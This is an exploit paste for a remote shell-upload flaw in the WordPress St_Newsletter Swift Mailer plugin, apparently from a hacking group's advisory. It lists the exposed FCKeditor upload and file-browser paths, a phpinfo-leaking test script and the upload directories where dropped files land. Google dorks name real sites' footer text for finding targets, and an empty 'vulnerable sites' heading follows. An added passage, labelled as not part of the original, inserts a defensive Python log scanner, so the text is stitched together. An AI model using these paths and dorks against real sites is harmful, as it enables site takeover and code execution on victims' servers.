KingSkrupellos

WordPress St_Newsletter Swift Mailer Plugins 2.7 Shell Vuln

Dec 19th, 2018
#################################################################################################

# Exploit Title : WordPress St_Newsletter Swift Mailer Plugins 2.7 Remote Shell Upload Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 20/12/2018
# Vendor Homepage : wordpress.org ~ forums.devnetwork.net ~ swiftmailer.symfony.com ~ swiftmailer.org
# Software Download Link : N/A ~ wordpress.org/plugins/swift-mailer/
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : 2.0 ~ 2.0.9 ~ 2.1.2 ~ 2.3 ~ 2.5.1 ~ 2.7
# Exploit Risk : Medium
# Google Dorks : inurl:''/wp-content/plugins/st_newsletter/''
+ intext:''© 2016 Prevent Cancer Now SUM LogoSUM Brand + Design''
+ intext:''Copyright © 2000-2012 Silicon Valley Fellowship''
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
+ CWE-434: Unrestricted Upload of File with Dangerous Type
# Visit Web Security Blog and Forum : cyberizm.org [ Team ] ~ ayarsecurity.com [ Friend ]

#################################################################################################

# Exploit :

/wp-content/plugins/st_newsletter/visual_editors/fckeditor/editor/filemanager/upload/test.html

/wp-content/plugins/st_newsletter/visual_editors/fckeditor/editor/filemanager/browser/default/connectors/test.html

/wp-content/plugins/st_newsletter/visual_editors/fckeditor/editor/filemanager/browser/default/browser.html

/wp-content/plugins/st_newsletter/visual_editors/fckeditor/editor/filemanager/browser/default/frmupload.html

/wp-content/plugins/st_newsletter/visual_editors/fckeditor/editor/fckeditor.html

# Directory File Path :

/wp-content/uploads/......

/wp-content/uploads/[YEAR]/[MONTH]....

# Exploit : phpinfo System Information

/wp-content/plugins/st_newsletter/Swift5/tests/units/runTests.php

#################################################################################################

# Note : The St_Newsletter Swift Mailer plugin contains a very serious vulnerability that lets an attacker gain full control of the site:
modify, upload and execute files on any WordPress site that has the plugin installed. The FCKeditor file-manager pages
shipped in the plugin's directory act as a backdoor through which an attacker can reach the web server over HTTP.
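As an added example (not part of the original paste), a defender-side check for the exposure described in the note: a Python classifier over web-server access-log lines that flags requests to the plugin paths listed above, POSTs into the FCKeditor file-manager tree, hits on the Swift5 test runner, and the follow-on sign of a PHP file being served from the uploads tree. The Apache/nginx combined log format and the sample log lines are assumptions.

```python
import re
# Paths taken from the advisory above (compared lower-cased).
PLUGIN_DIR = "/wp-content/plugins/st_newsletter/"
FILEMANAGER = PLUGIN_DIR + "visual_editors/fckeditor/editor/filemanager/"
PHPINFO_RUNNER = PLUGIN_DIR + "swift5/tests/units/runtests.php"
# Apache/nginx "combined" format; timestamp, referer and user-agent are not needed here.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})')

def parse_line(line):
    """Return {ip, method, path, status} for one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def classify(entry):
    """Return the alert tags that apply to one parsed request (empty list = benign)."""
    path = entry["path"].split("?", 1)[0].lower()
    tags = []
    if path.startswith(FILEMANAGER):
        tags.append("fckeditor-filemanager")  # exposed upload/browser pages from the advisory
        if entry["method"] == "POST":
            tags.append("upload-attempt")
    if path == PHPINFO_RUNNER:
        tags.append("phpinfo-runner")  # Swift5/tests/units/runTests.php
    # WordPress keeps only media under uploads; a served .php there is the footprint of a dropped shell.
    if path.startswith("/wp-content/uploads/") and path.endswith((".php", ".phtml", ".php5")):
        tags.append("php-in-uploads")
    return tags

def scan(lines):
    """Return (ip, method, path, status, tags) for every flagged request, in log order."""
    alerts = []
    for entry in filter(None, map(parse_line, lines)):
        tags = classify(entry)
        if tags:
            alerts.append((entry["ip"], entry["method"], entry["path"], entry["status"], tags))
    return alerts

# Constructed sample log: RFC 5737 documentation addresses and invented file names.
SAMPLE_LOG = """\
203.0.113.5 - - [19/Dec/2018:10:02:11 +0000] "GET /wp-content/plugins/st_newsletter/visual_editors/fckeditor/editor/filemanager/upload/test.html HTTP/1.1" 200 2311 "-" "Mozilla/5.0"
203.0.113.5 - - [19/Dec/2018:10:02:40 +0000] "POST /wp-content/plugins/st_newsletter/visual_editors/fckeditor/editor/filemanager/upload/test.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [19/Dec/2018:10:03:02 +0000] "GET /wp-content/uploads/2018/12/image.php?x=1 HTTP/1.1" 200 77 "-" "Mozilla/5.0"
198.51.100.7 - - [19/Dec/2018:10:05:00 +0000] "GET /wp-content/uploads/2018/12/photo.jpg HTTP/1.1" 200 48211 "-" "Mozilla/5.0"
198.51.100.7 - - [19/Dec/2018:10:05:31 +0000] "GET /wp-content/plugins/st_newsletter/Swift5/tests/units/runTests.php HTTP/1.1" 200 9031 "-" "curl/7.61"
"""

if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG.splitlines()):
        print(alert)
```

Run against a real log, the remediation is the same whichever tag fires: remove or block the plugin's FCKeditor file-manager and Swift5 test directories and deny PHP execution under /wp-content/uploads/.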

#################################################################################################

# Example Vulnerable Sites =>

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################